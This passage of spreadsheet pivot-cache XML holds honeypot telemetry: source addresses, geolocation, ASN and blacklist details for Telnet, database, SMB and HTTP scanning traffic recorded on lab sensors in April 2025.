    <d v="2025-04-14T08:40:19"/>
    <d v="2025-04-14T08:40:19"/>
    <d v="2025-04-14T08:40:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CO"/>
    <s v="Colorado"/>
    <s v="Larimer"/>
    <s v="Fort Collins"/>
    <s v="5577147"/>
    <s v="80523"/>
    <s v="40.5853"/>
    <s v="-105.084"/>
    <s v="7922"/>
    <s v="COMCAST-7922"/>
    <s v="Comcast Cable Communications"/>
    <s v="consumer"/>
    <s v="Comcast Cable Communications Holdings, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1997-09-25 04:00:00"/>
    <s v="2025-09-24 04:00:00"/>
    <s v="2024-09-20 05:10:59"/>
    <s v="['DNS101.COMCAST.NET', 'DNS102.COMCAST.NET', 'DNS103.COMCAST.NET', 'DNS104.COMCAST.NET', 'DNS105.COMCAST.NET']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Comcast Domains"/>
    <x v="13"/>
    <s v="NA"/>
    <s v="1701 JFK Blvd."/>
    <s v="::ffff:4b46:8f6f"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1885"/>
    <x v="1885"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:33:46"/>
    <d v="2025-04-14T08:33:46"/>
    <d v="2025-04-14T08:33:46"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Kanniyakumari"/>
    <s v="Nagercoil"/>
    <s v="1262204"/>
    <s v="NA"/>
    <s v="8.17899"/>
    <s v="77.4323"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:f7d9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1886"/>
    <x v="1886"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:19:53"/>
    <d v="2025-04-14T04:32:09"/>
    <d v="2025-04-14T08:19:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="Smartone"/>
    <s v="cellular"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="2010-03-04"/>
    <s v="SMARTMOBILE-AS-AP"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b698:cdcc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1887"/>
    <x v="1887"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:18:16"/>
    <d v="2024-01-12T08:31:00"/>
    <d v="2025-04-14T08:18:16"/>
    <n v="84"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;41916&amp;&amp;1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="SU"/>
    <s v="North Sumatra"/>
    <s v="Kabupaten Toba Samosir"/>
    <s v="Balige"/>
    <s v="1215510"/>
    <s v="NA"/>
    <s v="2.39557"/>
    <s v="99.1573"/>
    <s v="149965"/>
    <s v="PT. TOBA JAYA NET"/>
    <s v="PT. TOBA JAYA NET"/>
    <s v="business"/>
    <s v="PT. TOBA JAYA NET"/>
    <s v="2022-08-16"/>
    <s v="IDNIC-TOBAJAYA-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,57401)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,59576)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,60260)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,55702)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,56401)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,55331)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,55965)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,64933)}&amp;&amp;{Data_SMB:Incoming connection (103.139.139.10,49607)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:678b:8b0a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1888"/>
    <x v="1888"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:11:17"/>
    <d v="2025-04-10T08:44:29"/>
    <d v="2025-04-14T08:11:17"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="80&amp;&amp;5432&amp;&amp;6379&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="Microsoft Corporation"/>
    <s v="MICROSOFT"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ReportServer'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:87ed:7e06"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1889"/>
    <x v="1889"/>
    <s v="59-127-93-192.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:11:01"/>
    <d v="2024-07-12T16:12:00"/>
    <d v="2025-04-14T08:11:01"/>
    <n v="4302"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;2826&amp;&amp;80&amp;&amp;23&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:5dc0"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1890"/>
    <x v="1890"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:07:05"/>
    <d v="2025-04-14T08:05:59"/>
    <d v="2025-04-14T08:07:05"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Bandung"/>
    <s v="Bandung"/>
    <s v="1650357"/>
    <s v="NA"/>
    <s v="-6.92067"/>
    <s v="107.601"/>
    <s v="150210"/>
    <s v="PT Wadma Berkah Sedaya"/>
    <s v="PT Wadma Berkah Sedaya"/>
    <s v="business"/>
    <s v="PT Wadma Berkah Sedaya"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:670a:4731"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1891"/>
    <x v="1891"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:06:54"/>
    <d v="2025-04-14T07:51:37"/>
    <d v="2025-04-14T08:06:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="NA"/>
    <s v="22.3964"/>
    <s v="114.109"/>
    <s v="9312"/>
    <s v="xTom Hong Kong Limited"/>
    <s v="Owl Limited"/>
    <s v="hosting"/>
    <s v="Owl Limited"/>
    <s v="2018-11-23"/>
    <s v="OWL-HK-02"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:677d:e90d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1892"/>
    <x v="1892"/>
    <s v="static-ip-173-165-66-202.rev.dyxnet.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T07:58:08"/>
    <d v="2025-04-14T07:51:11"/>
    <d v="2025-04-14T07:58:08"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South Delhi"/>
    <s v="Aya Nagar"/>
    <s v="13157005"/>
    <s v="NA"/>
    <s v="28.472"/>
    <s v="77.1327"/>
    <s v="134337"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="business"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca42:a5ad"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1893"/>
    <x v="1893"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T07:46:58"/>
    <d v="2025-04-14T07:46:58"/>
    <d v="2025-04-14T07:46:58"/>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5:c264"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1894"/>
    <x v="1894"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T07:39:56"/>
    <d v="2025-04-14T07:39:56"/>
    <d v="2025-04-14T07:39:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:7b08"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1895"/>
    <x v="1895"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T07:31:55"/>
    <d v="2024-12-04T07:19:33"/>
    <d v="2025-04-14T07:31:55"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2009-02-10"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70a6:6647"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1896"/>
    <x v="1896"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T07:19:29"/>
    <d v="2025-04-14T07:19:29"/>
    <d v="2025-04-14T07:19:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="59162"/>
    <s v="UPCSPL-AS-IN"/>
    <s v="U.p. Communication Services Pvt Ltd"/>
    <s v="corporate"/>
    <s v="U.p. Communication Services PVT LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2df8:c46"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1897"/>
    <x v="1897"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T07:15:27"/>
    <d v="2025-04-14T07:12:14"/>
    <d v="2025-04-14T07:15:27"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NTW"/>
    <s v="Tsuen Wan"/>
    <s v="NA"/>
    <s v="Kwai Chung"/>
    <s v="1819595"/>
    <s v="NA"/>
    <s v="22.3692"/>
    <s v="114.132"/>
    <s v="142403"/>
    <s v="YISU CLOUD LTD"/>
    <s v="Yisu Cloud LTD"/>
    <s v="hosting"/>
    <s v="Ancent Group Limited"/>
    <s v="2017-09-12"/>
    <s v="YISUCLOUDLTD-HK"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6764:d1f7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1898"/>
    <x v="1898"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T07:04:54"/>
    <d v="2025-03-13T23:24:54"/>
    <d v="2025-04-14T07:04:54"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e7:8780"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1899"/>
    <x v="1899"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T06:35:06"/>
    <d v="2025-04-12T03:18:38"/>
    <d v="2025-04-14T06:35:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="HU"/>
    <s v="Hungary"/>
    <s v="PE"/>
    <s v="Pest County"/>
    <s v="NA"/>
    <s v="Érd"/>
    <s v="3053281"/>
    <s v="2030"/>
    <s v="47.392"/>
    <s v="18.9045"/>
    <s v="5483"/>
    <s v="Magyar Telekom plc."/>
    <s v="Magyar Telekom"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2012-08-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
